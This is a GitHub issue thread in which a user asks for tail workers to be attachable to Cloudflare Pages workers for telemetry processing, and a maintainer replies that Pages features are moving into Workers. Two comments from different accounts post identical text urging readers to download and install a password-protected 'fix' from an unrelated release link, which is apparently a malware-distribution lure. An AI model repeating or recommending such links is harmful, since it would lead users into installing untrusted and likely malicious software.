### ISSUE TITLE
🚀 Feature Request: Support Attaching Tail Workers to Workers from Pages Projects

### ISSUE THREAD

**Issue by thoughtentity** [cloudflare/workers-sdk#6597]
### Describe the solution

Currently, Cloudflare workers support a feature called tail workers that allows a worker to receive the execution status and logs of another worker. Tail workers are attached to workers using the `tail_consumers` property in their `wrangler.toml` file. However, when used in a Cloudflare Pages project, wrangler will error with a not supported error.

<img width="573" alt="image" src="https://github.com/user-attachments/assets/5a9ddfd9-2fe4-4425-975c-e8e1a3d99ce4">

I'd like to see feature parity for attaching tail workers to Cloudflare Pages generated workers as their really useful for post processing of telemetry data. In my case, I'm processing and shipping OpenTelemetry traces and logs from the worker via the tail worker for monitoring and observability. Having feature parity between pages and workers for tail workers would allow me to unify telemetry processing to a single tail worker for all my Cloudflare pages and workers projects.

**Comment by dionathanfreitas** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Jostino** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by RamIdeas** [comment]
Hi @thoughtentity! Thanks for the feature request! Rather than adding Workers features to Pages, we're instead adding Pages features to Workers. This is a great example of something that will be possible out-of-the-box then
